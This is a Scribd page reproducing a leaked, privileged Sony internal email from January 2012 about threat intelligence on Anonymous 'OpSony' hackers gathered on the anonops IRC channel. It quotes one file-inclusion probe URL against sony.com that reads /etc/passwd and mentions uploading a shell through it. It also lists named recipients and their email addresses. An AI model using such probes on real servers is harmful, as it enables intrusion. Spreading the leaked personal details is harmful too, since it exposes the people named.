Scribd Logo
Upload

Welcome to Scribd!

  • Sony's Spies in Anonops

    Uploaded by

    Edward Shelton
    104 views2 pages
    Sony's Spies in Anonops

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Sony's Spies in Anonops

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    104 views2 pages

    Sony's Spies in Anonops

    Uploaded by

    Edward Shelton
    Sony's Spies in Anonops

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    From:

    Sent:
    To:

    Subject:
    Attachments:

    Reitinger, Philip
    Thursday, January 12, 2012 9:16 AM
    Rice, Carolyn, Sony Music; Williams, Michael T (Law); 'jonathan.pearl@sonyericsson.com';
    'azaffron@soe.sony.com'; Weil, Leah; Traymore, Anthony (Legal); Takei, Natsuko;
    Gardner, Thomas; 'Paul.Stephens@sonyericsson.com'; Spaltro, Jason; Patel, Ajay;
    Delorenzo, Mark (SGS); Schwab, Ray; McLaughlin, Bob; Bernard, Stevan; Harkins, Jason;
    Leak, Wade, Sony Music; Russell, Riley (SCEA); Sterner, Charles; Wahlin, Brett; bblank
    (@soe); Podorowsky, Gary; Marong, Guy; Soulia, Sheila; Matsumoto, Keiichi; Shigenari,
    Masanobu; Seligman, Nicole; Ciesla, John
    RE: PRIVILEGED and CONFIDENTIAL - threat data Jan 11``
    EAS

    Privileged and Confidential


    Please do not distribute. Please note that this new report references an attacker assertion that Sony.com has been
    compromised too, along with sonypictures.com and sonyatv.com.
    There is additional information about several possible vulnerabilities. There is also some possible information about the
    source of the threat -do not distribute this.
    Note also some red information about an older (I think) issue with sony.com http://www.sony.com/utilities/printable.php?page=/etc/passwd
    possible rfi? -- this should be checked. If there is a possible RFI, a shell could be uploaded Cursory glance of the page
    returned 403 error. This was checked in more detail today by one of the analysts. PHP could be used to read password
    file if appropriate permissions are not set for the PHP processes. ICG recommends checking this.
    Last, below is the information we received from the consultant.
    Phil
    Verification is not complete, however what was learned is contained in the SPOTREP. We engaged who we have
    assessed to be the two main skilled hackers for the last 9 hours as they have been available and responsive. This is a
    tedious process and not proceeding expeditiously as expected. This resulted in increased information and access to a
    new private paste pad, and private IRC channel and also what is alleged to be one of the attack platforms. New
    information is contained in the report and attached for your review.
    Summary of findings to date:
    1.
    One of the two hackers, MonsteR, machines geo-locates in the Netherlands. We were able to connect to his
    machine by IP address. That said, the owner claims he lives in the UK and is apparently using a remote host in the
    Netherlands.
    2.
    The vulnerability we previously reported on the Sony site in the Middle East appears to be accurate. In spite of this,
    the server has NOT yet been compromised but it is vulnerable. The exact vulnerability is included in the report and the
    location on the server that is vulnerable is listed as well. If there are other sites hosted there they may be vulnerable as
    well.
    In spite of early promises to reveal information yesterday, all other claims remain unverified presently with promised
    information and access still forthcoming. We do have significantly increased access and have formed a stronger
    relationship with the two hackers. We are to meet online again today when exchange of additional attack details is
    promised to ensure there is no duplication of efforts. Therefore, we should have more details as the day progresses.

    Black_risker is ADAMANT, however, that he has already rooted SonyPictures.com and Sony.com; we have gotten him to
    promise to show/explain what/how, but are still waiting as indicated above.
    Finally, due to easy access of anyone joining the irc.anonops.li #opsony channel, there is a colorful and many times
    unreliable array of users in that channel. If independently monitoring that chatter it is recommended that information there
    be verified in some form or fashion. There was an antagonist/prankster in that channel last night suggesting that OpSony
    attack was imminent. That was a false assertion and the individuals motivation is unclear. They are fully aware that
    monitoring is going on in those channels and sometimes they provide disinformation for that very reason. There are key
    nicks associated with various parts of the plan or in overall control as we have noted. We can PM these nicks if
    clarification is needed, however the statements seen last night should originate from one of those nicks when execution
    actually occurs. Finally, they have seemed adamant since the start that their advertised timeline was a priority component
    they were unwilling to compromise.
    More updates today as further information is available

    Attachments:
    SONY SPOTREP 01112012.pdf (895168 Bytes)

    You might also like